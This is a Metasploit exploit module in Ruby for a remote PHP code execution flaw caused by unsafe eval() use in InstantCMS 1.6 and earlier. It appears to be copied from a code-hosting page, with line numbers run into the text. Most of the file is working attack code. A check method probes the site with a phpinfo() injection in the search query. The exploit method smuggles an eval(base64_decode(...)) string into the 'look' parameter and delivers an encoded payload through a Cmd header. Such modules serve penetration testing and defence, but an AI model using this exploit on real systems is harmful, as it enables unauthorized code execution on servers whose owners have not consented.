Path: blob/master/modules/exploits/unix/webapp/instantcms_exec.rb
19534 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',15'Description' => %q{16This module exploits an arbitrary PHP command execution vulnerability because of a17dangerous use of eval() in InstantCMS in versions 1.6 and prior.18},19'Author' => [20'AkaStep', # Vulnerability discovery and PoC21'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module22'juan vazquez' # Metasploit module23],24'License' => MSF_LICENSE,25'References' => [26[ 'BID', '60816' ],27[ 'PACKETSTORM', '122176' ]28],29'Privileged' => false,30'Platform' => 'php',31'Arch' => ARCH_PHP,32'Targets' => [33[ 'InstantCMS 1.6', {} ],34],35'DisclosureDate' => '2013-06-26',36'DefaultTarget' => 0,37'Notes' => {38'Reliability' => UNKNOWN_RELIABILITY,39'Stability' => UNKNOWN_STABILITY,40'SideEffects' => UNKNOWN_SIDE_EFFECTS41}42)43)4445register_options(46[47OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])48]49)50end5152def check53res = send_request_cgi({54'uri' => normalize_uri(target_uri.to_s),55'vars_get' =>56{57'view' => 'search',58'query' => '${echo phpinfo()}'59}60})6162if res and res.body.match(/Build Date/)63return Exploit::CheckCode::Vulnerable64end6566Exploit::CheckCode::Safe67end6869def exploit70print_status("Executing payload...")7172res = send_request_cgi({73'uri' => normalize_uri(target_uri.to_s),74'vars_get' =>75{76'view' => 'search',77'query' => rand_text_alpha(3 + rand(3)),78'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"79},80'headers' => {81'Cmd' => Rex::Text.encode_base64(payload.encoded)82}83})84end85end868788